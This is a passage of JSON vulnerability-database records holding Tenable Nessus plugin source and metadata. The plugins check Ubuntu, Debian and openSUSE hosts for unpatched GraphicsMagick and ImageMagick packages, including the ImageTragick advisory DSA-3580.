or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"graphicsmagick\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick++-q16-12\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick-q16-3\", pkgver:\"1.3.23-1ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphicsmagick / libgraphicsmagick++-q16-12 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-12T15:18:24", "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set of command-line applications to manipulate image files, which could result in denial of service or the execution of arbitrary code if malformed image files are processed.", "cvss3": 
{"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-18T00:00:00", "type": "nessus", "title": "Debian DSA-4321-1 : graphicsmagick - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10794", "CVE-2017-10799", "CVE-2017-10800", "CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11403", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11638", "CVE-2017-11641", "CVE-2017-11642", "CVE-2017-11643", "CVE-2017-11722", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-13776", "CVE-2017-13777", "CVE-2017-14314", "CVE-2017-14504", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15277", "CVE-2017-15930", "CVE-2017-16352", "CVE-2017-16353", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915", "CVE-2017-18219", "CVE-2017-18220", "CVE-2017-18229", "CVE-2017-18230", "CVE-2017-18231", "CVE-2018-5685", "CVE-2018-6799", "CVE-2018-9018"], "modified": "2019-07-15T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:graphicsmagick:*:*:*:*:*:*:*"], "id": "DEBIAN_DSA-4321.NASL", "href": "https://www.tenable.com/plugins/nessus/118179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4321. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118179);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\", \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\", \"CVE-2018-9018\");\n script_xref(name:\"DSA\", value:\"4321\");\n\n script_name(english:\"Debian DSA-4321-1 : graphicsmagick - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in GraphicsMagick, a set\nof command-line applications to manipulate image files, which could\nresult in denial of service or the execution of arbitrary code if\nmalformed image files are 
processed.\"\n );\n # https://security-tracker.debian.org/tracker/source-package/graphicsmagick\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e247f871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/graphicsmagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4321\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the graphicsmagick packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1.3.30+hg15796-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++-q16-12\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick-q16-3\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:28:08", "description": "This update for GraphicsMagick fixes the following issues :\n\n 
- CVE-2017-13775: Fixed a denial of service issue in ReadJNXImage() in coders/jnx.c (boo#1056431)\n\n - CVE-2017-13063: Fixed a heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c (bsc#1055050)\n\n - CVE-2017-13064: Fixed a heap-based buffer overflow vulnerability in the function GetStyleTokens in coders/svg.c (bsc#1055042)\n\n - CVE-2017-12936: The ReadWMFImage function in coders/wmf.c in GraphicsMagick had a use-after-free issue for data associated with exception reporting.\n (bsc#1054598)\n\n - CVE-2017-13139: The ReadOneMNGImage function in coders/png.c had an out-of-bounds read with the MNG CLIP chunk. (bsc#1055430)\n\n - CVE-2017-12937: The ReadSUNImage function in coders/sun.c in GraphicsMagick had a colormap heap-based buffer over-read. (bsc#1054596)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2017-1199)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13139", "CVE-2017-13775"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", 
"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1199.NASL", "href": "https://www.tenable.com/plugins/nessus/104235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1199.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104235);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13139\", \"CVE-2017-13775\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2017-1199)\");\n script_summary(english:\"Check for the openSUSE-2017-1199 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\n - CVE-2017-13775: Fixed a denial of service issue in\n ReadJNXImage() in coders/jnx.c (boo#1056431)\n\n - CVE-2017-13063: Fixed a heap-based buffer overflow\n vulnerability in the function GetStyleTokens in\n coders/svg.c (bsc#1055050)\n\n - CVE-2017-13064: Fixed a heap-based buffer overflow\n vulnerability in the function GetStyleTokens in\n coders/svg.c (bsc#1055042)\n\n - CVE-2017-12936: The ReadWMFImage function in\n coders/wmf.c in GraphicsMagick had a use-after-free\n issue for data associated with exception reporting.\n (bsc#1054598)\n\n - CVE-2017-13139: The ReadOneMNGImage function in\n coders/png.c had an out-of-bounds read with the MNG CLIP\n chunk. 
(bsc#1055430)\n\n - CVE-2017-12937: The ReadSUNImage function in\n coders/sun.c in GraphicsMagick had a colormap heap-based\n buffer over-read. (bsc#1054596)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1054596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1054598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056431\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = 
get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-debugsource-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"GraphicsMagick-devel-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick++-devel-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagick3-config-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-11.34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"GraphicsMagick-devel-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:56:25", "description": "Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered several vulnerabilities in ImageMagick, a program suite for image manipulation. These vulnerabilities, collectively known as ImageTragick, are the consequence of lack of sanitization of untrusted input. 
An attacker with control over the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if ImageMagick processes images coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and PLT) and indirect reads via the /etc/ImageMagick-6/policy.xml file. In addition, we introduce extra preventive measures, including some sanitization for input filenames in http/https delegates, the full removal of the PLT/Gnuplot decoder, and the need for an explicit reference in the filename for the insecure coders.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-17T00:00:00", "type": "nessus", "title": "Debian DSA-3580-1 : imagemagick - security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:imagemagick", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3580.NASL", "href": "https://www.tenable.com/plugins/nessus/91175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3580. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91175);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"DSA\", value:\"3580\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DSA-3580-1 : imagemagick - security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as\nImageTragick, are the consequence of lack of sanitization of untrusted\ninput. An attacker with control on the image input could, with the\nprivileges of the user running the application, execute code\n(CVE-2016-3714 ), make HTTP GET or FTP requests (CVE-2016-3718 ), or\ndelete (CVE-2016-3715 ), move (CVE-2016-3716 ), or read (CVE-2016-3717\n) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick\nprocesses images coming from remote parties, such as part of a web\nservice.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL,\nand PLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the\nfilename for the insecure coders.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-3717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/imagemagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the imagemagick packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 8:6.8.9.9-5+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif 